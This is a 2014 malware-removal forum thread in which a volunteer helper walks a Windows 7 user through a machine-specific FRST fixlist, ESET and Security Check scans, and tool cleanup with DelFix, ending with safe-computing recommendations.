Description: The Application Virtualization Service Agent service failed to start due to the following error:
%%2

Error: (10/27/2014 05:42:26 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Error: (10/27/2014 04:33:14 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/27/2014 04:33:14 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/27/2014 04:33:13 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/27/2014 04:33:13 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/27/2014 04:33:12 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/27/2014 02:55:40 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
Date: 2014-10-27 07:00:29.546
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-27 07:00:29.249
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-27 07:00:28.953
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-27 07:00:28.657
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-21 00:09:13.516
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-21 00:09:13.235
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: AMD Phenom II X4 830 Processor
Percentage of memory in use: 22%
Total physical RAM: 5887.18 MB
Available physical RAM: 4533.18 MB
Total Pagefile: 11772.53 MB
Available Pagefile: 10097.23 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: (WIN7) (Fixed) (Total:917.33 GB) (Free:163.88 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: CB5BD2B2)
Partition 1: (Not Active) - (Size=14.2 GB) - (Type=1B)
Partition 2: (Active) - (Size=917.3 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Naathim · October 28, 2014

Hi

Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.

Running it on another one may cause damage and render the system unstable.

Press the + R on your keyboard at the same time. Type Notepad and click OK.

Copy the entire content of the codebox below and paste into the Notepad document:

startCloseProcesses:Startup: C:\Users\LogMeInRemoteUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnkShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (No File)ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No FileFF Plugin: @microsoft.com/GENUINE -> disabled No FileFF Plugin-x32: @microsoft.com/GENUINE -> disabled No FileS3 catchme; \??\C:\ComboFix\catchme.sys [X]S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X]2014-10-25 01:45 - 2014-10-27 00:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Comodo2014-10-25 01:45 - 2014-10-26 14:11 - 00000000 ____D () C:\Program Files\COMODO2014-10-25 01:45 - 2014-10-25 01:47 - 00000000 ____D () C:\Program Files (x86)\Comodo2014-10-25 01:42 - 2014-10-26 14:11 - 00000000 ____D () C:\ProgramData\ComodoAlternateDataStreams: C:\ProgramData\TEMP:5C321E34AlternateDataStreams: C:\ProgramData\TEMP:F25DDE13AlternateDataStreams: C:\Users\McLain\Local Settings:f086wSl4AGfGJDPZoQwtRUAX3AlternateDataStreams: C:\Users\McLain\AppData\Local:f086wSl4AGfGJDPZoQwtRUAX3AlternateDataStreams: C:\Users\McLain\AppData\Local\Application Data:f086wSl4AGfGJDPZoQwtRUAX3EmptyTemp:end

Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

Right-click on icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
Press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please include it in your reply.

Scan with ESET Online Scanner

This step can only be done using Internet Explorer, Google Chrome or Mozilla Firefox.

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

Please visit ESET Online Scanner website.

Click there Run ESET Online Scanner.

If using Internet Explorer:

Accept the Terms of Use and click Start.
Allow the running of add-on.

If using Mozilla Firefox or Google Chrome:

Download esetsmartinstaller_enu.exe that you'll be given link to.
Double click esetsmartinstaller_enu.exe.
Allow the Terms of Use and click Start.

To perform the scan:

Make sure that Enable detecion of potentially unwanted applications is checked.
In the Advanced Settings dropdown menu:
- Make sure that Remove found threats is unchecked.
- Scan archives is checked.
- Scan for potentially unsafe applications and Enable Anti-Stealth technology are checked.
- Use custom proxy settings is unchecked.
Click Start
The program will begin to download it's virus database. The speed may vary depending on your Internet connection.
When completed, the program will begin to scan. This may take several hours. Please, be patient.
Do not do anything on your machine as it may interrupt the scan.
When the scan is done, click Finish.
A logfile will be created at C:\Program Files (x86)\ESET\ESET Online Scanner. Open it using Notepad.

Please include this logfile in your next reply.

Don't forget to re-enable previously switched-off protection software!

Scan with Security Check

Please download Security Check by Screen317 and save it to your desktop.

Right-click on icon and select Run as Administrator to start the tool.
Follow onscreen instructions inside the black box. This scan won't take long.
Soon a notepad document called checkup.txt will open automaticaly.

Please include the content of that document.

bmclain · October 28, 2014

Do i do something with fixlist.txt, or just leave it on the desktop?

Naathim · October 28, 2014

No, it should be just present in the same location the FRST tool is.

bmclain · October 28, 2014

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 27-10-2014
Ran by McLain at 2014-10-28 13:38:27 Run:1
Running from C:\Users\McLain\Desktop
Loaded Profile: McLain (Available profiles: McLain)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
CloseProcesses:
Startup: C:\Users\LogMeInRemoteUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X]
2014-10-25 01:45 - 2014-10-27 00:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Comodo
2014-10-25 01:45 - 2014-10-26 14:11 - 00000000 ____D () C:\Program Files\COMODO
2014-10-25 01:45 - 2014-10-25 01:47 - 00000000 ____D () C:\Program Files (x86)\Comodo
2014-10-25 01:42 - 2014-10-26 14:11 - 00000000 ____D () C:\ProgramData\Comodo
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34
AlternateDataStreams: C:\ProgramData\TEMP:F25DDE13
AlternateDataStreams: C:\Users\McLain\Local Settings:f086wSl4AGfGJDPZoQwtRUAX3
AlternateDataStreams: C:\Users\McLain\AppData\Local:f086wSl4AGfGJDPZoQwtRUAX3
AlternateDataStreams: C:\Users\McLain\AppData\Local\Application Data:f086wSl4AGfGJDPZoQwtRUAX3
EmptyTemp:
end
*****************

Processes closed successfully.
C:\Users\LogMeInRemoteUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk => Moved successfully.
C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => Key deleted successfully.
"HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
catchme => Service deleted successfully.
lmimirr => Service deleted successfully.
WinRing0_1_2_0 => Service deleted successfully.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Comodo => Moved successfully.
C:\Program Files\COMODO => Moved successfully.
C:\Program Files (x86)\Comodo => Moved successfully.
C:\ProgramData\Comodo => Moved successfully.
C:\ProgramData\TEMP => ":5C321E34" ADS removed successfully.
C:\ProgramData\TEMP => ":F25DDE13" ADS removed successfully.
"C:\Users\McLain\Local Settings" => ":f086wSl4AGfGJDPZoQwtRUAX3" ADS not found.
C:\Users\McLain\AppData\Local => ":f086wSl4AGfGJDPZoQwtRUAX3" ADS removed successfully.
"C:\Users\McLain\AppData\Local\Application Data" => ":f086wSl4AGfGJDPZoQwtRUAX3" ADS not found.
EmptyTemp: => Removed 374.6 MB temporary data.

The system needed a reboot.

==== End of Fixlog ====

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=688d268589aff145a0f157df13231e46
# engine=20822
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-10-28 10:05:58
# local_time=2014-10-28 03:05:58 (-0800, Pacific Daylight Time)
# country="United States"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='Avira Desktop'
# compatibility_mode=1810 16777213 100 99 0 2859698 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 0 166077408 0 0
# scanned=194110
# found=17
# cleaned=0
# scan_time=4807
sh=65383FE2A93BE685F8DD256B1A1FD3B67C310514 ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\AdwCleaner\Backup\C\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\prefs_20_10_2014_22_02_30.js"
sh=C2305E1BB5D513742D687ED23EEA2846306EFB08 ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\AdwCleaner\Backup\C\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\prefs_25_10_2014_00_10_47.js"
sh=8F0A085EBCADC702E941900D25F1C2DC7B285E27 ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\AdwCleaner\Backup\C\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\prefs_27_10_2014_14_54_49.js"
sh=97BCCD25561F44E9B13F05F6EEF083C9CE9BA529 ft=1 fh=641f1fb3d2e699c4 vn="Win32/Toolbar.Conduit.Y potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\Conduit\Community Alerts\Alert.dll.vir"
sh=DB5DEC21F203A3AE275461D03FF977C87C6C00F9 ft=1 fh=09feb8da0d515751 vn="Win32/Toolbar.Conduit.AC potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\Conduit\CT3310511\plugins\TBVerifier.dll.vir"
sh=1BB29099CFE4982EF016A6A560E758B8DF799270 ft=0 fh=0000000000000000 vn="a variant of Android/Mobserv.A potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\McLain\AppData\Local\Mobogenie\Version\OldVersion\Mobogenie2.1.36.zip.vir"
sh=659E678C5D8CE742CC03A211C59AA57E6018FDC6 ft=0 fh=0000000000000000 vn="a variant of Android/Mobserv.A potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\McLain\AppData\Local\Mobogenie\Version\OldVersion\Mobogenie\MUServer.apk.vir"
sh=81B2C6C5E931A22F152602B1BB01B1BBF333E1E4 ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\invalidprefs.js.vir"
sh=A906A9825AF80E67CF632DFD285CCDF287CF6B53 ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\user.js.vir"
sh=434238E15660618182F67150AA6677E0511601DA ft=1 fh=dc788dfa3665612c vn="Win32/Toolbar.Conduit potentially unwanted application" ac=I fn="C:\Qoobox\Quarantine\C\Users\McLain\Videos\zafwSetupWeb_133_209_000.exe.vir"
sh=CBF2870F6412D1D4D1B0A52370E4C9FFF1E794BE ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\prefs-1.js"
sh=4DF70E4E35352A8F9B1E0D4522948B7E2FA90CA5 ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\prefs.20141025.0.sbbackup"
sh=F23770048D99DCA84798DE0EFFA41F42AD486A9E ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\prefs.20141027.0.sbbackup"
sh=E073DC0C69B1B2F3A007C2DC7C43AC7315D0ADBA ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\prefs.js"
sh=E5CC5EEDBC48E4570C02F51EB6363897F40C76F4 ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\prefs.js.BAK"
sh=9FFE733FFA9E48BDE9F2D399822DA9FE5284CF55 ft=1 fh=6e56d9f8aef3b200 vn="a variant of Win32/Bundled.Toolbar.Ask.F potentially unsafe application" ac=I fn="C:\Windows\Installer\MSI27D1.tmp"
sh=7EA1990F9F3D0E7A43D9D4ECE9A484431D8FABE4 ft=0 fh=0000000000000000 vn="JS/SecurityDisabler.A.Gen potentially unwanted application" ac=I fn="C:\zoek_backup\C_Users_McLain_AppData_Roaming_Mozilla_Firefox_Profiles_iaxa0uvq.default-1353978850101_prefs_20141027_0433_.backup.vir"

Results of screen317's Security Check version 0.99.89
Windows 7 Service Pack 1 x64 (UAC is enabled)
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
Windows Firewall Disabled!
Avira Desktop
Antivirus up to date! (On Access scanning disabled!)
`````````Anti-malware/Other Utilities Check:`````````
Adobe Flash Player 15.0.0.189
Adobe Reader XI
Mozilla Firefox (33.0)
````````Process Check: objlist.exe by Laurent````````
Avira Antivir avgnt.exe
Avira Antivir avguard.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C: 0%
````````````````````End of Log``````````````````````

Naathim · October 29, 2014

OK, are there any outstanding issues? So far these logs look good

bmclain · October 29, 2014

Haven't had anything come up yet! Thank you!

bmclain · October 29, 2014

Any advice for preventing future problems? I wasnt even using an antivirus which I am now...

Naathim · October 29, 2014

There will be later. We need to do some cleanup now

Uninstall ComboFix

Please do not leave ComboFix on your machine installed. This is not a regular scanner and should be used only when told to do so by a malware expert.

Press the + R on your keyboard at the same time.
A Run window should appear in the lower left corner.
Please type in (or paste) the following:
```
ComboFix /uninstall
```
and press Enter.

You will see a brief uninstallation window and a prompt confirming its removal.

Remove locked FRST Quarantine

Press the + R on your keyboard at the same time. Type Notepad and click OK.

Copy the entire content of the codebox below and paste into the Notepad document:
```
DeleteQuarantine:
```
Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

Right-click on icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
Press the Fix button just once and wait.
When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please include it in your reply.

Clean with DelFix

Please download DelFix by Xplode and save it to your desktop.

Right-click on icon and select Run as Administrator to start the tool.
Ensure that Remove disinfection tools, Purge system restore and Reset system settings are checked.
Push Run.
When finished, it will display a notepad report.

Include it for my review.
Please also manually reboot your machine after posting your logfile.

bmclain · October 29, 2014

fixlog.txt was deleted off of my desktop when i ran delfix

# DelFix v10.8 - Logfile created 29/10/2014 at 03:04:20
# Updated 29/07/2014 by Xplode
# Username : McLain - MCLAIN-PC
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)

~ Removing disinfection tools ...

Deleted : C:\FRST
Deleted : C:\zoek_backup
Deleted : C:\AdwCleaner
Deleted : C:\ComboFix.txt
Deleted : C:\zoek-results.log
Deleted : C:\Users\McLain\Desktop\Addition.txt
Deleted : C:\Users\McLain\Desktop\AdwCleaner.exe
Deleted : C:\Users\McLain\Desktop\AdwCleaner[s2].txt
Deleted : C:\Users\McLain\Desktop\esetsmartinstaller_enu.exe
Deleted : C:\Users\McLain\Desktop\Fixlog.txt
Deleted : C:\Users\McLain\Desktop\FRST.txt
Deleted : C:\Users\McLain\Desktop\FRST64.exe
Deleted : C:\Users\McLain\Desktop\JRT.exe
Deleted : C:\Users\McLain\Desktop\JRT.txt
Deleted : C:\Users\McLain\Desktop\log.txt
Deleted : C:\Users\McLain\Desktop\SecurityCheck.exe
Deleted : C:\Users\McLain\Desktop\zoek.exe
Deleted : HKLM\SOFTWARE\OldTimer Tools
Deleted : HKLM\SOFTWARE\AdwCleaner
Deleted : HKLM\SOFTWARE\Swearware

~ Cleaning system restore ...

Deleted : RP #353 [ComboFix created restore point | 10/29/2014 10:00:53]

New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########

Naathim · October 29, 2014

But DelFix didn't remove FRST quarantine, so it was deleted earlier

Now the best part of the day - subject to no further issues, I believe that you are ready to go

Below you will find my thoughts about securing your machine. Go ahead through it, you will benefit from some useful advice about safe computing.

Recommended reading:

MUST READ - security tips: Keep your computer safe online.

MUST READ - general maintenance: Slow computer/browser? Check here.

Recommended additional software:

TFC - to clean unneeded temporary files.

Malwarebytes' Anti-Malware - to scan your system from time to time in search for malware.

Malwarebytes' Anti-Exploit - to prevent plenty of mostly exploited vulnerabilities.

McShield - to prevent infections spread by removable media.

CryptoPrevent - to secure yourself from very severe CryptoLocker infection.

Unchecky - to prevent from installing additional foistware, implemented in legitimate installations.

My help is always free, but if you are happy with the help provided and wish to help my fight against malware, please consider making a donation.

All donations are to refund a new HDD to replace the old one, which recently passed away!

Now if you have any other questions, feel free to ask me. Otherwise simply acknowledge my recommendations and this topic will be closed.

Stay safe,

Naat

AdvancedSetup · November 1, 2014

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Can somebody help me clean out multiple dllhost.exe

Recommended Posts

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Recently Browsing 0 members

Important Information